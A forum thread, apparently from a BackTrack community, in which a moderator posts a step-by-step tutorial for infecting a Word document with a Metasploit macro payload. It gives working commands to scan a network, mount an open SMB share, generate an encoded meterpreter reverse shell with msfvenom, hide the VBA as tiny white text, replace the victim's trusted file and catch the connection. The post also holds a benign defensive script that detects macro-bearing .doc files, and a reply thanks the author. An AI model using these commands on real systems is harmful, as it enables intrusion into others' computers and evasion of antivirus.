
Thread: [Video] Metasploit Vs Microsoft Office

  1. #1
    g0tmi1k (Moderator), joined Feb 2010, 1,771 posts

    [Video] Metasploit Vs Microsoft Office

    Links
    Watch video on-line: http://blip.tv/g0tmi1k/metasploit-vs...office-5241818
    Download video:
    http://www.mediafire.com/?qr6c0h9gva90mvv
    Brief Overview
    Following on from the Adobe Reader post, another very common document format is Microsoft's Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into the document can lead to compromising the target's computer.

    A macro is an 'automated shortcut' to repeat tasks, in this case, to generate a meterpreter payload and connect back to the attacker. Even though the payload can be encoded to bypass anti-virus, Microsoft Word could still block it depending on the macro security level.

    To infect the target, the attacker scans the network and finds an open shared folder, which they have read & write access to. Upon viewing the contents of the folder, the attacker notices a Word Document. However, presenting the infected file could be done a number of different ways, such as emailing the target instead of scanning & replacing.


    What do I need?
    * Metasploit – Download here. *Can be found on BackTrack 5.*
    * Microsoft Office - Can be bought from the online office store
    * Nmap - Download here. *Can be found on BackTrack 5.*
    * Samba - Download here. *Can be found on BackTrack 5.*
    * The attacker remotely controlled a 'test machine' using tightvnc which can be found on BackTrack 5. Download here.


    Method
    * Scan network for active hosts (nmap)
    * Scan host for open ports (nmap)
    * Scan for any available shares (Samba)
    * Mount shared folder & view contents of it (Samba)
    * Copy document onto another (Windows) machine. (Samba)
    * Create macro & embed the payload (Metasploit)
    * Try & hide the 'modifications' (Office)
    * Replace the original document with the infected version (Samba)
    * Wait for target to open the file
    * Game Over


    Commands:
    Code:
    apt-get install smbfs 
    nmap 192.168.0.* -n -sn
    nmap 192.168.0.105 -T5
    smbclient -L \\192.168.0.105 -N
    mkdir /mnt/shared
    smbmount //192.168.0.105/Documents /mnt/shared -o rw
    cd /mnt/shared && ls -l
    
    mkdir ../vnc
    smbmount //192.168.0.105/write /mnt/vnc -o rw
    cp SuperSecretStuff.doc ../vnc/
    
    ifconfig eth0   #hostname -I
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt
    
    vncviewer 192.168.0.124
    Notepad -> Open -> vba.txt
    Microsoft Word -> Tools -> Macro -> Visual Basic Editor
       Insert -> Module -> *Paste first half* -> Close
    Microsoft Word -> Page break -> *Paste second half* -> Font Size: 1 -> Font Colour: White -> Save -> Close
    
    cp ../vnc/SuperSecretStuff.doc ./
    clear
    
    msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 E

    Walk-through
    As the target has 'learnt their lesson' about opening email attachments from 'unknown' people, the attacker chooses to replace a 'trusted' file.

    The attacker has already connected to the network and starts to scan it to see if there are any active hosts currently connected. After locating the target, the attacker scans the target to see which of its ports are open. The results of the port scan show that the target could be sharing a folder on the network. The attacker proceeds by searching for shared resources. The attacker attempts to access a shared folder as a guest and, when prompted for any credentials, leaves them blank. The attacker gets lucky and has access to an open & writeable folder! After listing the contents of the folder, the attacker notices it has a document in it...

    Before the attacker clones the document, they mount a shared folder on a 'test machine' which they control. The reason for this is that the easiest way to inject a VBA macro is to use 'Microsoft Office' itself! The attacker then copies the target's document to the test machine.

    Afterwards, the attacker generates the VBA macro, which will be injected into the cloned document. When creating the macro, the attacker chooses to 'encode' the payload, which 'helps' bypass anti-virus - however this isn't essential as there isn't any installed!

    Once the macro has been transferred to the test machine, the attacker remotely connects to the machine to control it. The first stage of the infection is to create a macro and place the first piece of the generated code into it. The second piece of code goes into the document itself. As the code is very visible, the attacker decides to use the smallest font, therefore taking up the least amount of space. Setting the text colour to white, the same as the background colour, causes the text to appear invisible. The document is then saved and replaced over the original.

    The attacker then sits back & relaxes until the target opens the 'new infected' document... which the target soon does =). However! Depending on Microsoft Word's security level, either the user is presented with a warning message asking whether to enable or disable macros, the document doesn't open at all, or it opens without question! *As shown in the video*.


    Notes:
    * This is my first video using BackTrack 5; by default KDE has a semi-transparent Konsole window. This caused 'poor' results when encoding.
    * Camtasia didn't record the VNC session that well, hence why there was a bit of lag in places.
    * Blip.TV has recently had a makeover and has updated their internal system for encoding. I believe the videos are now encoded at a lower quality, compared to previously uploaded.
    * In the current release of metasploit, I created a link to 'msfvenom' before recording by doing: ln -s /opt/framework3/msf3/msfvenom /usr/local/bin/msfvenom. Hopefully this will be fixed/updated soon.
    * Beforehand, I had installed smbfs. This is missing from the video; however, you just need to run: apt-get install smbfs

    Song: Lazee Feat. Neverstore - Hold On (Matrix Futurebound Terrace Tantrum Remix)
    Video length: 5:39
    Capture length: 10:04
    Blog Post: g0tmi1k: [Video] Metasploit Vs Microsoft Office
    Forum Post: http://www.backtrack-linux.org/forum...tml#post204397
    ~g0tmi1k
    Have you...g0tmi1k?
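A defender-side check that goes with the technique in the post above, added here as an example (it is not g0tmi1k's code or anything from the video): a triage script that flags a legacy .doc whose OLE directory carries the VBA project names, so a macro-bearing copy of a document sitting on a share can be spotted before anyone opens it. OLE_MAGIC and the stream names are the documented Compound File / Word 97 ones; the sample blobs are constructed and are not real documents.

```python
"""Triage: does a legacy Word (.doc) file carry a VBA project?

A .doc is an OLE Compound File (CFB). Word keeps macros in a 'Macros'
storage holding a 'VBA' storage with '_VBA_PROJECT' and 'dir' streams.
CFB directory names are UTF-16LE and NUL-terminated, so scanning the raw
bytes for those names is a cheap first-pass indicator. This is a heuristic,
not a parser; confirm with a real OLE parser (e.g. oletools' olevba).
"""
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Directory names that are only present when a VBA project is embedded.
VBA_NAMES = ("Macros", "VBA", "_VBA_PROJECT")

def is_ole(data):
    """True if the blob starts with the CFB signature (.doc, .xls, .ppt)."""
    return data[:8] == OLE_MAGIC

def vba_indicators(data):
    """Return the VBA-related directory names found in an OLE blob."""
    return [n for n in VBA_NAMES
            if n.encode("utf-16-le") + b"\x00\x00" in data]

def triage(data):
    """Classify a blob: 'not-ole', 'no-macro-streams' or 'macro-bearing'."""
    if not is_ole(data):
        return "not-ole"
    hits = vba_indicators(data)
    if "VBA" in hits and ("Macros" in hits or "_VBA_PROJECT" in hits):
        return "macro-bearing"
    return "no-macro-streams"

def _fake_ole(names):
    """Constructed sample: CFB magic padded to a 512-byte header, then
    64-byte UTF-16LE name fields only. Not a valid OLE file; it exists
    solely to exercise the scan offline."""
    header = OLE_MAGIC.ljust(512, b"\x00")
    return header + b"".join(n.encode("utf-16-le").ljust(64, b"\x00")
                             for n in names)

# Constructed samples: one carrying a VBA project, one plain document.
MACRO_DOC = _fake_ole(["Root Entry", "WordDocument", "Macros", "VBA",
                       "_VBA_PROJECT", "dir", "ThisDocument"])
CLEAN_DOC = _fake_ole(["Root Entry", "WordDocument", "1Table", "Data"])

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Run it over the files on a share (`python triage.py /mnt/shared/*.doc`) and treat any 'macro-bearing' hit on a document that is not expected to contain macros as something to pull for closer inspection.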

  2. #2
    zimmaro (Good friend of the forums), Milano, joined Mar 2010, 407 posts

    Re: [Video] Metasploit Vs Microsoft Office

    This is the only original video!!!
    There are bad imitations around! muahahah!
    Thank you very much for your work! && ... welcome back!!!!!
    My most sincere esteem! (zimmaro)
